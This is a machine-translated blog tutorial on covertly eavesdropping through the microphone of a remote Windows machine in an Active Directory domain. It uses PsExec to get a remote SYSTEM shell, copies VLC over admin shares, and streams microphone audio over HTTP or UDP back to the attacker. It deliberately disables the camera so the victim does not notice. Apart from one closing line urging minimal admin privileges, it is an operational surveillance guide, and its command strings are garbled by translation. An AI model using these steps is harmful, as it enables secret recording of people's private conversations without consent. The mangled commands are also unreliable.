Introduction
I just recently ran into vindovyh domains (Active Directory) and learning many new and surprising. It so happened that a significant number of users in the domain organization have the right to local admins (technicians, programmers and others) (after all, not seldom it happens?). But the consequences of this are enormous. In this article we look at how you can eavesdrop on the sounds (conversations, negotiations) on remote machines.
Should be
- user in AD as the local admin (or simply to know the password of the local admins)
- Hardware capture audio (microphone) on the target machine. The most convenient case - the target machine is a laptop, there are built-in microphone (and a camera: D). So are we out of luck if the remote machine using a webcam or headset with microphone. Otherwise, you can often plug the microphone himself, and without the pale.
- Program to capture and transfer of multimedia over the network. We will use the player vlc. (No trojans:))
- program running processes remotely. Psexec will use a set of PsTools. Perfect for AD, however, for use as a time and must be a local admin on the target machine. It is noteworthy that the running processes are executed on behalf of the SYSTEM (!).
Practice
- To start, we need to throw distribution vlc on a remote machine, if it was not there. This can be done using the system common resources such as C $, D $ ... that is, \ \ target \ C $ \. If the shares are not publicly (meaning specifically closed), it is possible to open a network share when assistance PsExec team form:
net share C $ = C: \
$ character at the end means that the network resource will not be displayed in the list of open network of computer resources by default. And so, in a trivial way Throws distribution vlc on the remote machine.
- Next, start vlc we need a cmd from the remote machine. We use PsExec, executing a command like:
psexec.exe \ \ target \ cmd
Accordingly, we will get cmd on the target machine. The windows of running programs will not run on it (would be if you use the key -i y PsExec). By the way, PsExec able to fill in the executable file on the remote machine, if you specify a key -c. Go to the folder with the distribution vlc.
- Now the fun part: start vlc with the necessary parameters. To determine the command line to run vlc, we will run it at home, expose the necessary settings and see that the command received. Run vlc, click media -> streaming. Tab Grabber. Video device is put on "no" to avoid unnecessary errors in the absence of cameras and detection us, if the camera turns light. Put a check in the bottom of the "more options" and see the parameters komandroy line.
Take back from the "dshow: / /" (ie the source - capture device) and " : dshow-vdev = none: dshow-adev =: dshow-caching = 200"(ie, video device - no, the audio device - the default caching - 200 ms.). Now we must adjust our broadcast media are waiting for "Flow." In the destination directory add the desired path. I chose to http on port 8080, ie on the target machine up a Web server from which you can listen to it. Preferably, of course, choose to broadcast our car (or ours, from where to redirect with netcat). Remove the checkbox "Enable transcoding. We proceed in the Settings tab and copy the resulting configuration.
I have this ":sout = # http {mux = ffmpeg {mux = flv}, dst =: 8080 /}: no-sout-rtp-sap: no-sout- standard-sap: sout-keep"
- Thus, the command to start vlc on the remote machine takes the form:
vlc.exe dshow: / /: dshow-vdev = none: dshow-adev = : dshow-caching = 200: sout = # transcode {vcodec = h264, vb = 0, scale = 0, acodec = mp4a, ab = 128, channels = 2, samplerate = 44100}: http {mux = ffmpeg {mux = flv }, dst =: 8080 /}: no-sout-rtp-sap: no-sout-standard-sap: sout-keep
Can you run. If all is well, the target machine is already waiting for our connection on port 8080.
- Run our vlc on our machine that will listen. If you connect to a Web server, then you can run with these arguments:
vlc.exe http:// target: 8080 (no space after http://)
If you are broadcasting on our computer (eg for udp on port 1234), then run vlc as follows:
vlc.exe udp ://@: 1234
- If all the way through, then listen to the
Conclusions
It is very important minimize user privileges AD.
PsExec operates through a shared resource admin $, but its close may adversely affect the performance in AD. How exactly is not Google, but you never know.
With some modifications to the way a ride, not only in AD.
Links
A good description PsExec
Wiki for VLC.
|